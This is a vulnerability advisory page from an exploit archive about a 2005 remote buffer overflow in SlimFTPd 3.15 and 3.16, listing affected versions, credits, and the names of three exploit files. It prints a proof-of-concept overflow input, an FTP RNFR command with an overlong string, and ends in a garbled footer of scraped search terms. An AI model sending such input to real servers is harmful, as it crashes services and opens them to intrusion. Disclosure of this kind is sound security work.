about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability


Title WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
Published 2005-07-21-12:00AM
Updated 2005-08-14-07:17PM
Class Boundary Condition Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Raphael Rigo <ml-bugtraq@twilight-hall.net>.
Vulnerable  WhitSoft SlimFTPd 3.16
WhitSoft SlimFTPd 3.15
Not Vulnerable  WhitSoft SlimFTPd 3.17
Code   A proof of concept example is available:

ftp> quote RNFR 123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345

A proof of concept denial of service exploit (47slimftpd_bof.pl) was provided by Dim K0r0l <dim@acolytez.com>.

A proof of concept remote code execution exploit (redslim-slimftpd.c) was provided by redsand <redsand@redsand.net>:

The slimftpd_list_concat.pm exploit is available for Metasploit. /data/vulnerabilities/exploits/47slimftpd_bof.pl /data/vulnerabilities/exploits/redslim-slimftpd.c /data/vulnerabilities/exploits/slimftpd_list_concat.pm
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 10:08:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cve2003-05 sdas www.qi123. crontab/ru CMS is Fre Mail check %2525...2F sakura hav www.elnazj home.lt99. wman and d Foto vagin iiqahykoze pakistangi phpBB++por wman and d %2525...2F www.51308. mobile pho www.nanmen news/explo masala gur php-nuke+2 phpBB++por Dinesh news for c FINAL FANT Boom boom Wap fullse speedstrea www.xt08.c Dogf&a 9uuu9.cn hayfas Www.s& www.omnico bangla sex Www.sleazy function www.lvshul mambo+Remo apache .3. news for c php-nuke 2 www.googl W...Exploi Www.sleazy VideOs WWW.smasex AmiKit 1.2